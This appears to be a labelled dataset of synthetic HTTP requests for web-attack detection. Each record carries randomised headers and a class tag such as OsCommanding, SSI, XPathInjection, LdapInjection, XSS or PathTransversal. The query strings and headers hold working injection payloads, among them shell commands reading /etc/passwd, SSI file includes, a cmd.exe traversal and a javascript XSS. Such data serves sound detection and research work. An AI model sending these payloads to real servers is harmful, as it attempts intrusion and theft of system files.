GET /ou4eic/cqsRmSeofE/lgdeae.jpg?istt9pnsiyad7b=Hd&Rm0iEh=rskec&7@group byOfromP=mro%27++++or++ndz%2F0oi7hh%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D363%5D++++or+%27dabwb%27++++%3D+%27 HTTP/1.1
Host: www.hrDhuaueqN.uk:80
Connection: Nkzmng
Accept: */*
Accept-Charset: x-mac-roman
Accept-Encoding: *;q=0.9
Accept-Language: x1edsead-wsai;q=0.5
Cache-Control: max-age=5493
Client-ip: 208.72.48.53
Cookie: ldD9tUyt=t203rDN2o;2n=]dL3eCservicesun=osobInbgsoundnnull
Cookie2: $Version="5"
Date: Mon, 15 Jun 09 20:49:57 GMT
ETag: "xcInQ_66Zglzx9B"
Expect: 100-continue
From: s8can@mqtlr.fr
If-Modified-Since: Sat, 14 Jul 07 07:52:09 UTC
If-Unmodified-Since: Thu, 30 Jul 09 11:24:27 UTC
If-Match: "-jPulvoVoH1-@qDy2C"
If-None-Match: *
If-Range: Tue, 19 Sep 06 14:38:20 CET
Max-Forwards: 8
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: NTLM b29vaWlpaGFpb2dsYXJlbnJhdHd4b2NjbWhsQ3N0c25vaHI=
Range: -615,3-,271930-
Referer: http://www.eancnae.com/eD8ezdjr/erane.jpeg
TE: trailers,trailers,deflate;q=0.4
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.9 (X11; U; Solaris 3.2; 2a-ti; rv:9.0.5) Gecko/15395405
UA-CPU: x86
UA-Disp: 2831,824,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8115x7637
Via: HTTP/3.9 69.14.45.135:2819
Transfer-Encoding: compress
Upgrade: ioh/5.5, bzl/3.8, 7md9/8.9, Pus3ou/3.2, nIiiic/7.8
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49877
Start - Id: 38545
class: LdapInjection
GET /ez@9DX_Moqmi4fUgsP_@/do94y4fi/hV@4x69pn6t4EgFS2-NA/Fn8sgp2hiEs/Iendvn3m/GnwiOBhXfEInegsk4D/egXJeKY8tAvxk_K6PVIQ/Sijceraieqeqohx/I5RIaYT/u5/rmardHtg.gif?ssnph-Jyg8.aF3Z=498816&el3=ohcuaasmestTxru&ovm7336=be%3Emcgh&ij=54&rna=lesrac&yfJ8jOstdin=5388&wilce72Sh=462438&6nsdEiIa=dtChede&thtadiesrRjYllh=89438620&ycyizys=aiuEhI&Ramhrl8veeH=2047805&0brn5liavia=%29++%28+%7C++++%28cn%3D*o+%27brien*+++%29%28mail%3D*o%27brien*+++%29++&arrg6va=2h%3ATa%5B%29Anft%3E%25tD HTTP/1.1
Host: www.ishwp.org
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: windows-1252, euc-cn;q=0.6
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 137.169.169.214
Cookie: nce=eQ848oNuf;O7shutdownjAO=15779149;9rirg8o=s(lprocessing-instructionbgsound@;sncn= on;
Cookie2: $Version="697"
Date: Mon, 16 Jan 06 16:04:29 CET
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: yyiraR
From: zttnih@4elXnnltkb.org
If-Modified-Since: Mon, 04 Oct 04 24:01:58 CET
If-Unmodified-Since: Fri, 09 Nov 07 09:51:35 CET
If-Match: "KHrJYbevKkFtDHn"
If-None-Match: *
If-Range: Sat, 29 Aug 09 18:19:43 UTC
Max-Forwards: 8305
MIME-Version: 2.4
Pragma: vemwp='et'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Basic RTU5ZXA3czM6ZXdEdnlnbW4=
Range: 447-,158917-
Referer: http://www.tfse.org/eatjto5h/T9ns/alo9.pl
TE: gzip
Trailer: If-Range
User-Agent: uf84GwJF http://www.2esstk.net
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: 2.3 157.122.93.120
Transfer-Encoding: identity
Upgrade: ghm/2.7, nshsr/6.5, e5b/0.7, Iosom/6.6
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38545
Start - Id: 43316
class: OsCommanding
GET /ehntbo2w/jz5ntc/e1oe_IobEUXN53S/nf0VlJ/lhbsie/B5K0XN/eCiYuiwa4.jpg?0KKPPpassthru9ncO=noah11wkw3has&srg=lleflsinEaoha&tismiunc=0&LSTVWtmp=ls+++-las+++%2Fhome%2F+%7C&xolOolt=15&ssrgthlwu9tne=91464&eeitjnp4s=6&xetnsS8=c9L&tromhqiel=90 HTTP/1.1
Host: www.orn14oi.be
Connection: 5sSi
Accept: text/html;q=0.1, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=3460
Client-ip: 170.237.233.234
Cookie: oih2U7wa662nw=46;VfM9E.cgy=RlSo1E7|e
Cookie2: $Version="3"
Date: Fri, 13 Aug 04 02:50:18 UTC
ETag: "40ys2g9rXHb@kzHexja"
Expect: sdce=weooimt
From: ehhmnsme@ohym.uk
If-Modified-Since: Wed, 29 Jun 05 21:59:07 UTC
If-Unmodified-Since: Mon, 31 Jan 05 03:53:13 UTC
If-Match: *
If-None-Match: "SqtapM8htxOM8Ikn"
If-Range: Thu, 04 Feb 10 05:59:42 CET
Max-Forwards: 5848
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: Digest qop=mokEmOt
Range: 7-25,-90,16289-
Referer: http://iheun05t.net/maimZo6.bin
TE: gzip;q=0.6,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/1.4 (X11; U; SunOS sun4u 9.9; r1-gn; rv:9.8.8) Gecko/10783453
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: tttnd
Upgrade: eCaleh/5.6, orv/6.7, AtlTSf/2.9, td7/4.6
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 295019193
----: -------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43316
Start - Id: 36821
class: OsCommanding
GET /HvVc/l3xjVF9EZcatHEg/SsamGKHQ7IU.sh?o5elcI27xsehwm=7078141&elestlehsl=caic%3Beiee9tph5&oosrlsotteR=3&wp-WeBc4=76427&kiui=rAcNBPxy&ni=pstkn&Y@0lspasswd6Hp=++++%3B++echo%3B+w+++++%3B+++++uname+-a++%3Bid HTTP/1.1
Host: www.EuhieA2tls.be:4982
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1252;q=0.7, x-mac-hebrew;q=0.3, macintosh, x-mac-chinesetrad, x-mac-arabic;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: si='am4dy'
Client-ip: 108.91.8.21
Cookie: eQnMepNti8e=noeedg;dri=ooe;djbinV=ya;Vnph-K346htpass=dle
Cookie2: $Version="33"
Date: Tue, 05 Jan 10 14:37:10 CET
ETag: W/"bxR1QgfsUgshIYR6I"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Wed, 21 Nov 07 01:07:25 GMT
If-Unmodified-Since: Sat, 11 Aug 07 21:01:20 GMT
If-Match: "m.weT1rjei6Vefie"
If-None-Match: *
If-Range: *
Max-Forwards: 25
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: Basic c25pb3JncjppbjFvcnRyVw==
Range: -95
Referer: /ax7y.swf
TE: deflate;q=0.9,gzip
Trailer: If-Match
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 4.2; ae-ta; rv:9.2.4) Gecko/03917063
UA-CPU: 68000
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1930x9863
Via: 8.1 26.230.241.19, 9.7 www.andt.js:6584
Transfer-Encoding: identity
Upgrade: er9lae/9.7, tsv3/3.1, ouoda/7.7, rtop/0.7
Warning: 649 www.csc0sg.js "anssgt3hmn3ennroren" "Wed, 05 Dec 07 14:41:31 UTC"
X-Serial-Number: 076281973736224985
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36821
Start - Id: 49353
class: XPathInjection
GET /ls/tcpsezebuuuods3isoo/deletenyOQ0FQ/dj.K5E6N@@TYH./CJCwget6n/Mrhflncs2t4ptmuttjis.exe?zVc7=B%28eRameiat%5B%2Bg%3D&js=iato8xpie6&AdiretdShasa8m=fe6%3C1s&oWBCBloD5r=ltamzha1ea0ie&sxElblh=group+byNf&sadir9eijs=%2Bsystemxml&2namsot=tsHI&etiheii4nobk=40741991&5Rtdpt=46795&lew6Winilndas=4&aosoLdeToOfc=etm0oof%27++or+6+%3C+++++count%28path%2Fchild%3A%3A*%29++or+++++%27xc%27%3D++++%27 HTTP/1.0
Host: 220.188.223.124
Connection: close
Accept: audio/*;q=0.8, image/*
Accept-Charset: iso-8859-1;q=0.3, x-mac-roman
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: 1c0=mesH
Client-ip: 144.73.134.163
Cookie: asordhw0erhg=a7uan);ra=cXPiX8R;tbd6uuYdhqEi=wRScf;2pftnnaievidE=styleyrI;DOACo=86895;6oatdofpctae3u=whle
Cookie2: $Version="6"
Date: Sun, 14 Mar 10 01:33:59 UTC
ETag: W/"e7ALYWdkwT_kw1lOFgF"
Expect: nteo1rm=hlxEErme
From: EgerC@tafwi.com
If-Modified-Since: Mon, 17 May 04 10:57:50 UTC
If-Unmodified-Since: Mon, 21 Nov 05 13:04:21 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 86
MIME-Version: 2.9
Pragma: S0a=hmeef
Proxy-Authorization: NTLM ZWxpanNqcm1TNm5JaWRyTHI4aHNobzNtVHZsdHRhb2Y4b3Jz
Authorization: Basic ZWVobGdmdDppYmN1Ng==
Range: 896-
Referer: http://www.iodl.be/7ieinyof/eeaMc/uKqij/engBeOeA.css
TE: chunked,chunked;q=0.9
Trailer: Accept-Encoding
User-Agent: tihetnz (n47hd8X0v; opPHpQ)
UA-CPU: StrongARM
UA-Disp: 646,996,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 953x2070
Via: 3.6 www.icidl6pn.jpeg, 3.4 www.nott.shtml, 8.4 www.8iN5T.htm
Transfer-Encoding: compress
Upgrade: vJltet/0.9, dda/3.3, iieen/3.3, aNr4k2/1.4, h82fxs/8.6
Warning: 168 180.56.143.92 "19ohloeeIes" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 68426632486242488
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49353
Start - Id: 44120
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.antie.org:80
Connection: an2u
Accept: image/*;q=0.1, image/png;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale=75
Client-ip: 178.250.250.231
Cookie: YTCdivC=%e;IuXe=and
Cookie2: $Version="066"
Date: Sat, 01 Aug 09 01:44:27 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: qrumvR@uodIyinab6.uk
If-Modified-Since: Wed, 31 Jan 07 20:22:15 GMT
If-Unmodified-Since: Sun, 18 Jan 09 09:25:20 CET
If-Match: *
If-None-Match: "v9taLmA2KHvsnCWYhh7H"
If-Range: Sat, 11 Apr 09 13:22:06 GMT
Max-Forwards: 840
MIME-Version: 9.5
Pragma: hi='eciendp'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 6-5561
Referer: http://rsnbd.gov/i1eer2t/itoipe.aspx
TE: trailers
Trailer: Date
User-Agent: Mozilla/9.5 (compatible; MSIE 4.5; Solaris; rndoD)
UA-CPU: x86
UA-Disp: 0410,9029,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: compress
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44120
Start - Id: 40452
class: SSI
GET /eacN8d0l7YZ3VHuhy/jgYIc23@@nKXRvpH_M/ekVwXeox9xfZ8z.php4?uigtrtwnee0eh=%3C%21--+++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E HTTP/1.0
Host: www.nCwanD.org
Connection: keep-alive
Accept: audio/*;q=0.9, application/*, audio/*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: u-tzagw3ro, r4ueeirm-o2, Gaimt-oiydize, 5apo67n-xc;q=0.5, egg-fba;q=0.6
Cache-Control: max-age=4
Client-ip: 183.187.114.208
Cookie: logLEmfhnD=uees1aalhy7y;w3gueh44uaob=0770535971
Cookie2: $Version="879"
Date: Thu, 04 May 06 21:19:55 GMT
ETag: "63htvQ03lV1P1aqZu@3F"
Expect: onof
If-Modified-Since: Sat, 04 Mar 06 14:11:57 GMT
If-Unmodified-Since: Fri, 14 Aug 09 15:42:49 CET
If-Match: "n@KwXW_lhi@MHH0c3MmF"
If-None-Match: *
If-Range: "6zeH@kkgvFG9NLBtk"
Max-Forwards: 268
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: 2eg8q 4ltgtAr9=na5Ilsmg
Authorization: Basic cmxodlI6bGJoaA==
Range: 648391-0593,082-86156,297927-83
Referer: http://1ab6e32.de/elo1e/ecip/hfit9.swf
TE: trailers
Trailer: If-Match
User-Agent: rhsI6s/0.7.4
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4401x4707
Via: FTP/5.7 www.sf9De.gif, Atsd/0.4 www.Umo5os.htm:09381
Transfer-Encoding: gzip
Upgrade: Fet/1.1, nsHe/6.2
Warning: 037 www.zncew.jpg "u3loce3odp3oeC" 
X-Forwarded-For: 51.175.205.249
X-Serial-Number: 9011770
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40452
Start - Id: 47666
class: XSS
GET /e7ESoWSri/R90akgCYnshutdownI90MT/NsinbmiTse4errotEdv/geoen.jpg?4dYrwft=5237677&oiqd9dly5ovihe=%3Cmeta+++http-equiv%3D%22+++++refresh+++++%22++++content%3D+++%22+++++0%3Burl%3Djavascript%3A+%5Balert++++%28%27ni%27%29%3B%5D%22%3E HTTP/1.0
Host: 74.142.227.116
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.3, compress, identity, identity;q=0.0, deflate;q=0.7
Accept-Language: sdi6nC-oaceu, rssF9t-iAndre;q=0.5
Cache-Control: ea6eab=h
Client-ip: 39.154.184.38
Cookie: obf=tlRwatt1ag;ziteA=1196;Ia=59565;xcrt9v=cy;eg9cc=35792
Cookie2: $Version="8"
Date: Sun, 23 Nov 08 14:35:36 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 31 Aug 09 11:29:07 CET
If-Unmodified-Since: Sat, 06 Feb 10 09:42:22 CET
If-Match: *
If-None-Match: *
If-Range: "l_ORPJKEZn2GZH8S"
Max-Forwards: 8663
MIME-Version: 7.7
Pragma: co=ibi
Proxy-Authorization: Digest algorithm=MD5
Authorization: Digest qop=aae5
Range: -017,-1,-32
Referer: /rsni3/igsw/stu2/qad4h0/cnatn2nw.tiff
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/7.7 (Machintosh; U; Mac OS X 6.4; kt-8b; rv:4.2.1) Gecko/14495017
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7165x674
Via: onmdt/3.2 www.nn1l.html:6, FTP/5.8 www.ttswnyn.png, 7.2 www.tThadooj.js
Transfer-Encoding: compress
Upgrade: lica5r/6.9
Warning: 036 www.sm7aE.jpeg "OA9la" "Thu, 19 Nov 09 13:07:50 GMT"
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47666
Start - Id: 45050
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: www.oztinl.be
Connection: keep-alive
Accept: text/*;q=0.0, image/*
Accept-Charset: iso-2022-jp, iso-8859-6;q=0.0, iso-8859-6;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: min-fresh=5
Client-ip: 0.96.11.108
Cookie: 7taMehizeT=nd5tIf3eotte;7pVTBZ=zso;ilisxtGai=311316;ovocd9LOeneat=h)pseoiiH5n
Cookie2: $Version="8"
Date: Mon, 29 Jan 07 13:50:24 GMT
ETag: W/"tEDzViflK5b0IYZZ"
Expect: 100-continue
From: Otai@40ezesm.uk
If-Modified-Since: Sat, 01 Dec 07 15:54:58 CET
If-Unmodified-Since: Thu, 27 May 04 23:47:01 GMT
If-None-Match: *
If-Range: Mon, 14 Jul 08 20:42:00 CET
Max-Forwards: 12
Pragma: no-cache
Authorization: NTLM cnpvczh0amN6ZTdlOWFlVGlyb3NEYWRlbGVoaFppeTIwZQ==
Range: -6543,-6,-30
Referer: /e4gcswr.exe
Trailer: Host
User-Agent: eQasTB-S http://www.cuntMt1o.uk
UA-CPU: PowerPC
UA-Disp: 7777,3718,16
UA-OS: Windows 95
UA-Pixels: 127x929
Transfer-Encoding: compress
Upgrade: sLa/4.9
Warning: 905 80.144.212.89 "cvcWhwiseqlaaOni" "Wed, 28 Jan 09 19:24:15 UTC"
X-Forwarded-For: 25.98.245.116
X-Serial-Number: 986205312934896
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45050
Start - Id: 40608
class: SSI
GET /1aeeeIlenhi9ooy/4Q0@pny6uBSxrmU/ws7s9eaoxiIte.html?EttTcqsn=%24%29miwgpe&Q6SAeupdateY=liettdrsajdoev&7amptf=903307&cest=On&ewHEaccess_log4=xmAc&8U12tsInc=%3C%21--+++++%23include++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+--%3E HTTP/1.1
Host: 116.147.255.75
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r;q=0.7, iso-2022-kr, big5, x-mac-hebrew;q=0.4
Accept-Encoding: compress;q=0.3, deflate;q=0.6, deflate;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 146.4.65.176
Cookie: CBLFa=eIdrst;3MOO_8g@v_J= eO;nuemotmcz89e7a=uata>sh\xi |ff;wnsgrotgiewfcg=c;ahnkrt=186187;ikelS=2eti
Cookie2: $Version="0"
Date: Wed, 27 Aug 08 15:19:57 CET
ETag: W/"hRpE5sdLGOIMRDDGsThB"
Expect: 100-continue
From: q67lte@ielenft.it
If-Modified-Since: Wed, 14 Feb 07 07:04:38 GMT
If-Unmodified-Since: Thu, 10 Jun 04 17:25:28 CET
If-Match: "D11xxMOuagBnAt8sG"
If-None-Match: "g.mWlbhsz2mDp5UsZ"
If-Range: "DhNRDE3.PKXg4A5TyA"
Max-Forwards: 391
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: bcfrun ebAc=Lgatnzn
Authorization: NTLM cnllZWFvT2RkYVBubW5pdGh5ZWV1czlvaWRodGd0aG9t
Range: -7,-7178,-26215
Referer: /ndvSostg/potites.jsp
TE: deflate;q=0.2
Trailer: Expect
User-Agent: ibdRAbN http://www.dtltxe.org
UA-CPU: PowerPC
UA-Disp: 252,6478,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7337x662
Via: 1.9 79.187.123.114:3936
Transfer-Encoding: gzip
Upgrade: crlln/8.7, m6mMa/6.8, ehdTt/0.9, Rtiaun/0.7
Warning: 740 www.iawi.png:527 "cErneOeniy5Rfoed" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 431541377
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40608
Start - Id: 37840
class: LdapInjection
GET /xtbIari/0diqpC4WOM8/t452Gam1efJ4KB@XW/@-/5o1kiIexOgLX9fl6est/RS4c/nhneapeee1t5naathda/sDPnfK1l363/yQhmSmDSu.o@e7d@gvoi/au0A9Oi/xI9orBZR.VYnBxml_bin.htm?iFnoRetdctNdcam=wCGj0plOR&ue9=272081&teh4lfqqygae=sgIe%29%28+++%7C+%287Nri%3D*%29&iztsrRuxu4=Tklniut0aei&rmiEf=8826629758&zgch=dek HTTP/1.1
Host: 198.63.195.52
Connection: close
Accept: text/plain, audio/*;q=0.1
Accept-Charset: windows-1258, koi8, iso-8859-8;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: d-p6
Cache-Control: no-cache
Client-ip: 7.198.93.40
Cookie: o3iasEe=slUW1Uqb@;lwoooizhhkoUnud=16018264;tmssQrt=script<oqa e<iaoiowinntvetp
Cookie2: $Version="3"
Date: Fri, 05 Feb 10 03:58:35 GMT
ETag: "v.u7W79d5gfnlTy"
Expect: lw1usH=epexaq
From: tlocso@Staohr.gov
If-Modified-Since: Thu, 22 Apr 04 01:32:46 UTC
If-Unmodified-Since: Fri, 27 Aug 04 03:06:12 UTC
If-Match: *
If-None-Match: "XBOcKZN7Bz3uM7Yy"
If-Range: "G..oIsvFTps4g1nGtpp"
Max-Forwards: 6437
MIME-Version: 1.8
Pragma: a8veae=fheo
Proxy-Authorization: xDzhen at43Wr=te5gtta
Authorization: NTLM ZXhTbjNFZXdkbGludUVicGlhR2JhdnR1bm90RGVlb3B3YmxBY3lrY2M5QQ==
Range: 853418-,-430
Referer: http://Gzdemdxh.biz/d8mbaemu/a5alsh/ntrdEo/tt9e52je/riy0es7.mpg
TE: trailers
Trailer: Accept
User-Agent: Mozilla/4.1 (Machintosh; U; PPC Mac OS X 9.8; 8x-lt; rv:8.4.1) Gecko/47067645
UA-CPU: 68000
UA-Disp: 780,4386,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 707x739
Via: 3.3 www.yu5ol.jpeg:6, 0.8 www.creo4t.png, FTP/0.7 105.102.160.82
Transfer-Encoding: foctbw
Upgrade: msdjj/6.3, nhneNR/6.0, amsilt/6.3
Warning: 819 www.pedj.gif "e9rth" "Tue, 15 Sep 09 22:46:26 GMT"
X-Forwarded-For: 138.39.90.47
X-Serial-Number: 52385869909
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37840
Start - Id: 35483
class: XPathInjection
GET /dLUR0EgRfqdRRLVXq/mcAAO5-UUEeuM6qp.v/sVlocationBd%ufH/d1fA503xmANi/abmhsmisyodno.htm?yUnB=tggdQp&nuebh=Olls HTTP/1.1
Host: www.5Ce3mt.st:87
Connection: keep-alive
Accept: */*
Accept-Encoding: 249     or  count(path/child::node()[position()=((i+j+k+l+1)]     |  path/child::*()[position()=(k+1)])=1    or   87792=
Accept-Language: ri0jtbt-atf3mowy;q=0.5, sphnyfa-elaeohi;q=0.0, ra5eeboa-s
Cache-Control: max-stale
Client-ip: 28.193.148.19
Date: Mon, 05 Dec 05 14:57:51 GMT
If-Unmodified-Since: Mon, 26 Jun 06 18:10:55 GMT
Referer: /hacnt/oarbrln.asp
User-Agent: Mozilla/7.8 (compatible; o64do; WinNT; rsoCEpAfz; tytr2lS)
UA-Disp: 7314,843,8

null

End - Id: 35483
Start - Id: 35932
class: PathTransversal
GET /i5raoIahmGmthaeurQs/nre/ftyliii/pdaltteuiieis6cl/ueodte/stylevariframeC5I.tiff?6eHgb=cYUZ9%40%40RMsj&Sitlnriicaoe=96703833&5LEyislsttrspb=d%3BoNe&yeateS=9183244418&XoBhyva=%3C%21--+++++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22+++--%3E HTTP/1.0
Host: www.8nsitEt.st:03
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-ce, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 111.208.189.237
Date: Fri, 22 Jul 05 18:19:29 UTC
ETag: W/"YdL@MxnUcp1wtpf"
From: guNijtrt@taipn3.org
If-Unmodified-Since: Thu, 17 May 07 10:00:48 UTC
If-None-Match: *
If-Range: *
Max-Forwards: 546
Pragma: N='cn'
Proxy-Authorization: Digest cnonce="ei6idr"
Authorization: Digest nc=Fc7b56e1
Range: 2-,-884
Referer: http://www.er9I7.it/ensNc/nwtptElt/yadseD.mdb
TE: gzip;q=0.6,chunked;q=0.2,gzip
User-Agent: rauptEmdoqied
Via: 8.7 25.222.64.103
Transfer-Encoding: compress
----: ----------------------------------------

null

End - Id: 35932
Start - Id: 49618
class: XPathInjection
GET /X2RFQ2.CMCKGGnull/0-siZy8EMXmail7winntD/jIKXeARrQ7/2G/cPW9@q..nsf?hesAR=%28%3Cc&q8-du.PWg=21+++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+87990%3D HTTP/1.1
Host: www.mnstEtznw.ch
Connection: tsresag
Accept: video/quicktime;q=0.1
Accept-Charset: windows-1254, iso-8859-1, euc-cn, x-mac-chinesesimp;q=0.1, macintosh;q=0.2
Accept-Encoding: 
Accept-Language: C-im, fu7rlt-4, i70wu-c;q=0.8, e-smsbAh, brret-resn;q=0.4
Cache-Control: max-stale=428
Client-ip: 230.240.19.221
Cookie: _inZAlL9W=au
Cookie2: $Version="4"
Date: Tue, 01 May 07 07:23:14 UTC
ETag: "FQUYY8_.5L@nP2cP"
Expect: pdqtsr
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Thu, 14 May 09 03:59:41 UTC
If-Unmodified-Since: Tue, 12 Jan 10 12:09:52 GMT
If-Match: *
If-None-Match: *
If-Range: "9E2RCRc4yeL3usjC-bn"
Max-Forwards: 99
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: Digest opaque="yrkewrte"
Range: -098
Referer: http://reqr.org/ianfgok/Hl5heo.wmn
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/6.7 (X11; U; Linux i586 6.4; jt-rm; rv:2.6.7) Gecko/89450345
UA-CPU: Sparc
UA-Disp: 8099,582,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 8.1 www.csen7ri.shtml, cnigeh/2.5 79.208.64.84
Transfer-Encoding: compress
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 141 6.229.143.172 "7AsdeyisiebLeerrt" "Thu, 07 Aug 08 05:12:44 GMT"
X-Forwarded-For: 136.223.224.191
X-Serial-Number: 9696710
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49618
Start - Id: 42927
class: OsCommanding
GET /emDzV0Z8.cgi?apwewoDaCshaog=8%25%2Br&rreoiuinf=aslewfe2uf9TdWbiTk&Wnkm=d&eFwgetO36Vjf=oirtlhtr0tdcmnb&ntjOgauwyiP=seOev&ooagrss2Au=753900315&naw1d7e96=fi&Eqn6=66327076&te=xKmzYra7WJAx&cn6sa0eaeYaaR=86&e6xa7n=+s HTTP/1.0
Host: 148.63.198.248:80
Connection: keep-alive
Accept: image/png;q=0.4, video/*;q=0.4, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: cat   /etc/passwd  |
Accept-Language: *;q=0.1
Cache-Control: max-stale=172
Client-ip: 251.173.122.211
Cookie: trevrdsaemto=it8sonentgeuol;cad=40001834;ySVr5Zra3=k496765lR9e;eys=u1EtZI9;bjsep=3XKd2tGq;0lt5=44764669
Cookie2: $Version="82"
Date: Fri, 17 Apr 09 10:46:37 CET
ETag: W/"dcw1nK4.kEPb-kAWR."
Expect: 100-continue
From: oIteteaa@odaSo1YA.it
If-Modified-Since: Mon, 27 Nov 06 07:11:53 UTC
If-Unmodified-Since: Tue, 24 Oct 06 17:10:48 CET
If-Match: *
If-None-Match: "gjjDFrzql1f_pFnIb-de"
